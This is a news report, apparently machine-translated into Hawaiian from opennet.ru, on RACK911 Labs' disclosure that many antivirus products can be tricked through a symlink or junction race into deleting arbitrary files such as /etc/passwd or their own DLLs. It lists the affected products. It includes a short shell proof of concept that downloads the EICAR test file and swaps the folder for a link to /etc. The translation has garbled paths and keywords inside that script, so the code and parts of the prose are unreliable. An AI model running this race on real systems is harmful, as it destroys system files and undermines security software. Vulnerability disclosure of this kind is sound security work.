Nā mea noiʻi mai RACK911 Labs ʻaneʻane hiki i nā pūʻolo antivirus āpau no Windows, Linux a me macOS ke hoʻopilikia ʻia i ka hoʻopunipuni ʻana i nā kūlana lāhui i ka wā o ka holoi ʻana i nā faila i ʻike ʻia ai ka malware.
No ka hoʻokō ʻana i kahi hoʻouka kaua, pono ʻoe e hoʻouka i kahi faila i ʻike ʻia e ka antivirus he mea ʻino (no ka laʻana, hiki iā ʻoe ke hoʻohana i kahi hōʻailona hōʻoia), a ma hope o kekahi manawa, ma hope o ka ʻike ʻana o ka antivirus i ka faila hewa, akā ma mua o ke kāhea ʻana i ka hana. e holoi iā ia, e hoʻololi i ka papa kuhikuhi me ka faila me kahi loulou hōʻailona. Ma Windows, no ka loaʻa ʻana o ka hopena like, hoʻokō ʻia ka hoʻololi ʻana i ka papa kuhikuhi me ka hoʻohana ʻana i kahi hui kuhikuhi. ʻO ka pilikia, ʻaʻole i nānā pono nā antiviruses āpau i nā loulou symbolic a, me ka manaʻoʻiʻo e holoi ana lākou i kahi faila hewa, holoi ʻia ka faila i ka papa kuhikuhi kahi i kuhikuhi ai nā loulou symbolic.
Ma Linux a me macOS, hōʻike ʻia pehea e hiki ai i kahi mea hoʻohana pono ʻole ke holoi i /etc/passwd a i ʻole nā faila ʻē aʻe, a ma Windows ka waihona DDL o ka antivirus ponoʻī e ālai i kāna hana (ma Windows ka hoʻouka ʻana i kaupalena wale ʻia i ka holoi ʻana. nā faila i hoʻohana ʻole ʻia e nā noi ʻē aʻe). No ka laʻana, hiki i ka mea hoʻouka ke hana i kahi papa kuhikuhi "exploit" a hoʻouka i ka faila EpSecApiLib.dll me kahi pūlima virus test i loko, a laila hoʻololi i ka papa kuhikuhi "exploit" me ka loulou "C:\Program Files (x86)\McAfee\ Endpoint Security\Endpoint Security" ma mua o ka holoi ʻana iā Platform", e alakaʻi i ka wehe ʻana i ka waihona EpSecApiLib.dll mai ka waihona antivirus. Ma Linux a me macos, hiki ke hana ʻia kahi hoʻopunipuni like me ka hoʻololi ʻana i ka papa kuhikuhi me ka loulou "/ etc".
#! / bin / sh
rm -rf /home/mea hoʻohana/hoʻohana; mkdir /home/mea hoʻohana/hoʻohana/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
oiai inotifywait -m "/home/mea hoʻohana/exploit/passwd" | grep -m 5 “WEHE”
do
rm -rf /home/mea hoʻohana/hoʻohana; ln -s /etc /home/user/exploit
hana aku ai
Eia kekahi, nui nā antiviruses no Linux a me macOS i ʻike ʻia e hoʻohana i nā inoa faila i ka wā e hana ana me nā faila pōkole i ka papa kuhikuhi /tmp a me / private/tmp, hiki ke hoʻohana ʻia e hoʻonui i nā pono i ka mea hoʻohana kumu.
I kēia manawa, ua hoʻoponopono ʻia nā pilikia e ka hapa nui o nā mea hoʻolako, akā ʻike ʻia ua hoʻouna ʻia nā leka mua e pili ana i ka pilikia i nā mea hana i ka hāʻule o 2018. ʻOiai ʻaʻole i hoʻokuʻu nā mea kūʻai a pau i nā mea hou, ua hāʻawi ʻia iā lākou ma kahi o 6 mau mahina e hoʻopaʻa ai, a manaʻoʻiʻo ʻo RACK911 Labs i kēia manawa ka manuahi e hōʻike i nā nāwaliwali. Ua ʻike ʻia ua hana ʻo RACK911 Labs i ka ʻike ʻana i nā nāwaliwali no ka manawa lōʻihi, akā ʻaʻole ia i manaʻo he paʻakikī loa ka hana ʻana me nā hoa hana mai ka ʻoihana antivirus ma muli o ka lohi i ka hoʻokuʻu ʻana i nā mea hou a me ka nānā ʻole i ka pono e hoʻoponopono koke i ka palekana. pilikia.
Nā huahana i hoʻopilikia ʻia (ʻaʻole i helu ʻia ka pūʻolo antivirus manuahi ClamAV):
- Linux
- ʻO BitDefender GravityZone
- ʻO Comodo Endpoint Security
- Palekana Kōnae Eset Pūnaewele
- Palekana Linux F-Secure
- ʻO Kaspersy Endpoint Security
- ʻO McAfee Endpoint Security
- ʻO Sophos Anti-Virus no Linux
- Windows
- Avast Free Anti-Virus
- ʻO Avira Free Anti-Virus
- ʻO BitDefender GravityZone
- ʻO Comodo Endpoint Security
- Palekana Kamepiula F-Secure
- ʻO ka palekana FireEye Endpoint
- Kahakaha X (Sophos)
- ʻO Kaspersky Endpoint Security
- Malwarebytes no ka Windows
- ʻO McAfee Endpoint Security
- Kaha Panda
- Palekana ʻo Webroot ma nā wahi āpau
- macOS
- AVG
- BitDefender Huina Maluhia
- Ka palekana ʻo Eset Cyber
- Kaspersky Internet Security
- ʻO McAfee Pūʻulu Kū'ē
- ʻO Microsoft Defender (BETA)
- Norton Haulekana
- ʻO Sophos Home
- Palekana ʻo Webroot ma nā wahi āpau
Source: opennet.ru